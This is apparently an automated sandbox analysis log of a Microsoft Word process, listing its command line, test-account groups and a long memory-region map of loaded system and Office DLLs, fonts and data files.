# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 11.08.2022 16:41:05.727 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\office16\\winword.exe" page_root = "0x394aa000" os_pid = "0x10a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 264 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 265 start_va = 0x210000 end_va = 0x3e7fff monitored = 0 entry_point = 0x211000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe") Region: id = 266 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 267 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 268 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 269 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 270 start_va = 0x7c0000 end_va = 0x7c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 271 start_va = 0x7d0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 272 start_va = 0x7e0000 end_va = 0x7e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 273 start_va = 0x7f0000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 274 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 275 start_va = 0x810000 end_va = 0x811fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 276 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 277 start_va = 0x830000 end_va = 0x831fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 278 start_va = 0x840000 end_va = 0x841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 279 start_va = 0x850000 end_va = 0x851fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 280 start_va = 0x860000 end_va = 0x861fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 281 start_va = 0x870000 end_va = 0x871fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 282 start_va = 0x880000 end_va = 0x883fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 283 start_va = 0x890000 end_va = 0x891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 284 start_va = 0x8a0000 end_va = 0x8a4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 285 start_va = 0x8b0000 end_va = 0x8bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 286 start_va = 0x8c0000 end_va = 0x8cefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 287 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 288 start_va = 0x8e0000 end_va = 0x8e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 289 start_va = 0x8f0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 290 start_va = 0x930000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 291 start_va = 0xa30000 end_va = 0xad8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 292 start_va = 0xb60000 end_va = 0xb8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 293 start_va = 0xb90000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 294 start_va = 0xba0000 end_va = 0xd27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 295 start_va = 0xd30000 end_va = 0xeb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 296 start_va = 0xec0000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 297 start_va = 0x22c0000 end_va = 0x2478fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 298 start_va = 0x2480000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 299 start_va = 0x24a0000 end_va = 0x2614fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 300 start_va = 0x2620000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 301 start_va = 0x2630000 end_va = 0x2937fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 302 start_va = 0x2940000 end_va = 0x3260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 303 start_va = 0x3270000 end_va = 0x80aefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 304 start_va = 0x8120000 end_va = 0x815ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 305 start_va = 0x8160000 end_va = 0x8160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008160000" filename = "" Region: id = 306 start_va = 0x8170000 end_va = 0x826ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008170000" filename = "" Region: id = 307 start_va = 0x82e0000 end_va = 0x8616fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 308 start_va = 0x8620000 end_va = 0x871ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008620000" filename = "" Region: id = 309 start_va = 0x8720000 end_va = 0x8720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 310 start_va = 0x8730000 end_va = 0x8730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 311 start_va = 0x8740000 end_va = 0x877ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 312 start_va = 0x8780000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 313 start_va = 0x8880000 end_va = 0x897ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 314 start_va = 0x8980000 end_va = 0x8980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 315 start_va = 0x8990000 end_va = 0x8990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 316 start_va = 0x89a0000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 317 start_va = 0x89e0000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 318 start_va = 0x8ae0000 end_va = 0x8b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ae0000" filename = "" Region: id = 319 start_va = 0x8b20000 end_va = 0x8c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b20000" filename = "" Region: id = 320 start_va = 0x8c20000 end_va = 0x8c68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 321 start_va = 0x8c70000 end_va = 0x8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c70000" filename = "" Region: id = 322 start_va = 0x8d70000 end_va = 0x956ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 323 start_va = 0x9570000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 324 start_va = 0x9970000 end_va = 0x9a2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009970000" filename = "" Region: id = 325 start_va = 0x9a30000 end_va = 0x9a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a30000" filename = "" Region: id = 326 start_va = 0x9a40000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a40000" filename = "" Region: id = 327 start_va = 0x9f40000 end_va = 0x9f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 328 start_va = 0x9f50000 end_va = 0x9f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 329 start_va = 0x9f60000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 330 start_va = 0x9fa0000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 331 start_va = 0xa0a0000 end_va = 0xa0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0a0000" filename = "" Region: id = 332 start_va = 0xa0b0000 end_va = 0xa0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = "" Region: id = 333 start_va = 0xa0f0000 end_va = 0xa1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0f0000" filename = "" Region: id = 334 start_va = 0xa1f0000 end_va = 0xa1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 335 start_va = 0xa200000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 336 start_va = 0xa240000 end_va = 0xa24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a240000" filename = "" Region: id = 337 start_va = 0xa250000 end_va = 0xa34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a250000" filename = "" Region: id = 338 start_va = 0xa350000 end_va = 0xa35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a350000" filename = "" Region: id = 339 start_va = 0xa360000 end_va = 0xa363fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a360000" filename = "" Region: id = 340 start_va = 0xa370000 end_va = 0xab6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a370000" filename = "" Region: id = 341 start_va = 0xab70000 end_va = 0xabaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ab70000" filename = "" Region: id = 342 start_va = 0xabb0000 end_va = 0xacaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000abb0000" filename = "" Region: id = 343 start_va = 0xacb0000 end_va = 0xaceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000acb0000" filename = "" Region: id = 344 start_va = 0xacf0000 end_va = 0xadeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000acf0000" filename = "" Region: id = 345 start_va = 0xadf0000 end_va = 0xae2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000adf0000" filename = "" Region: id = 346 start_va = 0xae30000 end_va = 0xaf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae30000" filename = "" Region: id = 347 start_va = 0xaf30000 end_va = 0xaf30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000af30000" filename = "" Region: id = 348 start_va = 0xaf40000 end_va = 0xaf40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000af40000" filename = "" Region: id = 349 start_va = 0xaf50000 end_va = 0xaf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af50000" filename = "" Region: id = 350 start_va = 0xaf90000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af90000" filename = "" Region: id = 351 start_va = 0xb090000 end_va = 0xb0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b090000" filename = "" Region: id = 352 start_va = 0xb0d0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0d0000" filename = "" Region: id = 353 start_va = 0xb1d0000 end_va = 0xb1d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 354 start_va = 0xb1e0000 end_va = 0xb1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 355 start_va = 0xb1f0000 end_va = 0xb3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 356 start_va = 0xb3f0000 end_va = 0xb46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3f0000" filename = "" Region: id = 357 start_va = 0xb5b0000 end_va = 0xb5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 358 start_va = 0xb5c0000 end_va = 0xb5d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 359 start_va = 0xb5e0000 end_va = 0xb5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5e0000" filename = "" Region: id = 360 start_va = 0xb5f0000 end_va = 0xb5f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 361 start_va = 0xb600000 end_va = 0xb601fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b600000" filename = "" Region: id = 362 start_va = 0xb610000 end_va = 0xb61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b610000" filename = "" Region: id = 363 start_va = 0xb620000 end_va = 0xb6fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 364 start_va = 0xb700000 end_va = 0xb700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b700000" filename = "" Region: id = 365 start_va = 0xb710000 end_va = 0xc70ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 366 start_va = 0xc710000 end_va = 0xc7eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 367 start_va = 0xc7f0000 end_va = 0xcbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c7f0000" filename = "" Region: id = 368 start_va = 0xcbf0000 end_va = 0xcc31fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 369 start_va = 0xcc40000 end_va = 0xcc41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc40000" filename = "" Region: id = 370 start_va = 0xcc50000 end_va = 0xcd25fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc50000" filename = "" Region: id = 371 start_va = 0xcd30000 end_va = 0xce05fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd30000" filename = "" Region: id = 372 start_va = 0xce10000 end_va = 0xce2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce10000" filename = "" Region: id = 373 start_va = 0xce30000 end_va = 0xce4efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce30000" filename = "" Region: id = 374 start_va = 0xd130000 end_va = 0xd13ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d130000" filename = "" Region: id = 375 start_va = 0xd140000 end_va = 0xd14ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d140000" filename = "" Region: id = 376 start_va = 0xd150000 end_va = 0xd15ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d150000" filename = "" Region: id = 377 start_va = 0xd160000 end_va = 0xd566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 378 start_va = 0xd570000 end_va = 0xd976fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d570000" filename = "" Region: id = 379 start_va = 0xd980000 end_va = 0xdd82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d980000" filename = "" Region: id = 380 start_va = 0xdda0000 end_va = 0xde1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dda0000" filename = "" Region: id = 381 start_va = 0xde20000 end_va = 0xde30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 382 start_va = 0xde40000 end_va = 0xee7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 383 start_va = 0xee80000 end_va = 0xf35dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee80000" filename = "" Region: id = 384 start_va = 0x34400000 end_va = 0x3440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034400000" filename = "" Region: id = 385 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 386 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 387 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 388 start_va = 0x69660000 end_va = 0x69682fff monitored = 0 entry_point = 0x696769b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 389 start_va = 0x69690000 end_va = 0x696e1fff monitored = 0 entry_point = 0x696b8290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 390 start_va = 0x696f0000 end_va = 0x69821fff monitored = 0 entry_point = 0x6975bf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 391 start_va = 0x69830000 end_va = 0x69845fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 392 start_va = 0x69850000 end_va = 0x69870fff monitored = 0 entry_point = 0x6985bdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 393 start_va = 0x69880000 end_va = 0x6a074fff monitored = 0 entry_point = 0x698e5279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\chart.dll") Region: id = 394 start_va = 0x6a080000 end_va = 0x6a112fff monitored = 0 entry_point = 0x6a0a0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 395 start_va = 0x6a120000 end_va = 0x6a30efff monitored = 0 entry_point = 0x6a165e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 396 start_va = 0x6a310000 end_va = 0x6a376fff monitored = 0 entry_point = 0x6a325a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 397 start_va = 0x6a380000 end_va = 0x6a388fff monitored = 0 entry_point = 0x6a383830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 398 start_va = 0x6a390000 end_va = 0x6a3c3fff monitored = 0 entry_point = 0x6a3a8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 399 start_va = 0x6a3d0000 end_va = 0x6a571fff monitored = 0 entry_point = 0x6a3d1000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 400 start_va = 0x6a580000 end_va = 0x6a587fff monitored = 0 entry_point = 0x6a5817b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 401 start_va = 0x6a590000 end_va = 0x6a60cfff monitored = 0 entry_point = 0x6a5a0db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 402 start_va = 0x6a610000 end_va = 0x6a668fff monitored = 0 entry_point = 0x6a620780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 403 start_va = 0x6a670000 end_va = 0x6a7e2fff monitored = 0 entry_point = 0x6a71d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 404 start_va = 0x6a7f0000 end_va = 0x6a84bfff monitored = 0 entry_point = 0x6a7f8880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") 